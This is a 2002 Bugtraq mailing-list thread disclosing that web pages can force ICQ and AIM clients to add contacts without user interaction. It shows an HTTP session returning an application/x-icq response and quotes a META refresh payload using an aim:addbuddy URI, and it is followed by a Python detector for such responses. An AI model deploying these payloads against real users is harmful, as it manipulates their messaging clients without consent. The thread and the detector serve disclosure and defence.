Re: AIM forced behavior "issue" Re:ICQ and MSIE allow execution of arbitrary code

Knud,
This issue is still here; only the address that you use is no longer valid,
because it has changed...
At the end is the HTTP session (for my ICQ, beware :)).
It also seems that no one is paying attention to Jelmer's exploit for ICQ and MSIE.
It must be examined thoroughly for other variants, and a complete solution must
be given to the community!
ATTENTION: it is a HIGH security risk for clients - it works with almost any
ICQ and IE, and ICQ must be installed in the default path, or a script must "guess"
where, but anyway this is a very common case.


HTTP session for ICQ:

GET http://wwp.icq.com/whitepages/add_me/?uin=71398287&action=add HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Accept-Language: bg,en-us;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
Host: wwp.icq.com
Proxy-Connection: Keep-Alive

HTTP/1.0 200 OK
Date: Thu, 18 Jul 2002 07:12:12 GMT
Server: Apache/1.3.26 (Unix) mod_ssl/2.8.9 OpenSSL/0.9.6d
P3P: CP="ONL UNI COM PHY NAV INT DEM CURo OUR"
Content-Type: application/x-icq
Proxy-Connection: close

<!-- Vignette StoryServer 5.0 Thu Jul 18 03:12:12 2002 -->
[ICQ User]
UIN=71398287
Email=
NickName=
FirstName=
LastName=


----- Original Message -----
From: "Knud Erik Højgaard" <kain@egotrip.dk>
To: "orb" <orb@mindflip.org>; <bugtraq@securityfocus.com>
Sent: Monday, July 16, 2001 11:44 PM
Subject: Re: AIM forced behavior "issue"


> > Example
> > <META HTTP-EQUIV="refresh"CONTENT=0;URL=aim:addbuddy?listofscreennames=mindfliporg,mfliporb,mflipmax,mflips0nic,mflipzorcon&groupname=mindfliporg>
> >
> > A web page loaded with the above code in its META REFRESH tag would
> > automatically add a group to the user's buddylist called mindfliporg and
> > add buddies
> > mindfliporg, mfliporb, mflipmax, mflips0nic, mflipzorcon to the group.
>
> We tried some similar stuff with icq a while ago, live example at
> http://knudergud.dk/dev/icq.html ..
> it seems broken now, but the idea should be obvious. adding to a contact
> list using javascript, requiring
> no user interaction.. stupid software.
>
> -Knud
>
>
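
A defensive check for the behaviour both messages describe, as an added example that is not part of the original thread: it inspects a raw HTTP response at a proxy or filter and flags a Content-Type that is handed to an installed client (application/x-icq, as in the session above) or a META refresh that points at a non-web URI scheme (aim:, as in the quoted example). The function name, the finding labels and the sample responses are constructed for illustration.

```python
import re

# MIME types a browser hands to an installed client instead of rendering.
# application/x-icq is the type seen in the session above; extend as needed.
HANDLER_MIME_TYPES = {"application/x-icq"}
WEB_SCHEMES = {"http", "https"}

META_TAG = re.compile(r"<meta\b[^>]*>", re.I)
IS_REFRESH = re.compile(r"http-equiv\s*=\s*[\"']?refresh", re.I)
# Scheme of the refresh target; tolerates unquoted, unspaced attributes.
REFRESH_URL = re.compile(r"url\s*=\s*[\"']?\s*([a-z][a-z0-9+.\-]*):", re.I)


def inspect_response(raw):
    """Return a list of (finding, detail) tuples for one raw HTTP response."""
    raw = raw.replace("\r\n", "\n")
    head, _, body = raw.partition("\n\n")
    findings = []
    for line in head.split("\n")[1:]:  # skip the status line
        name, _, value = line.partition(":")
        if name.strip().lower() == "content-type":
            mime = value.split(";")[0].strip().lower()
            if mime in HANDLER_MIME_TYPES:
                findings.append(("handler-mime", mime))
    for tag in META_TAG.findall(body):
        if IS_REFRESH.search(tag):
            m = REFRESH_URL.search(tag)
            if m and m.group(1).lower() not in WEB_SCHEMES:
                findings.append(("refresh-to-scheme", m.group(1).lower()))
    return findings


# Constructed samples modelled on the two messages above (values are made up).
ICQ_SAMPLE = ("HTTP/1.0 200 OK\r\nContent-Type: application/x-icq\r\n\r\n"
              "[ICQ User]\r\nUIN=0\r\n")
AIM_SAMPLE = ("HTTP/1.0 200 OK\nContent-Type: text/html\n\n"
              '<META HTTP-EQUIV="refresh"CONTENT=0;'
              "URL=aim:addbuddy?listofscreennames=example1&groupname=examplegroup>")
BENIGN_SAMPLE = ("HTTP/1.0 200 OK\nContent-Type: text/html; charset=utf-8\n\n"
                 '<meta http-equiv="refresh" content="5; url=http://example.com/next">')

if __name__ == "__main__":
    for label, sample in [("icq", ICQ_SAMPLE), ("aim", AIM_SAMPLE),
                          ("benign", BENIGN_SAMPLE)]:
        print(label, inspect_response(sample))
```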

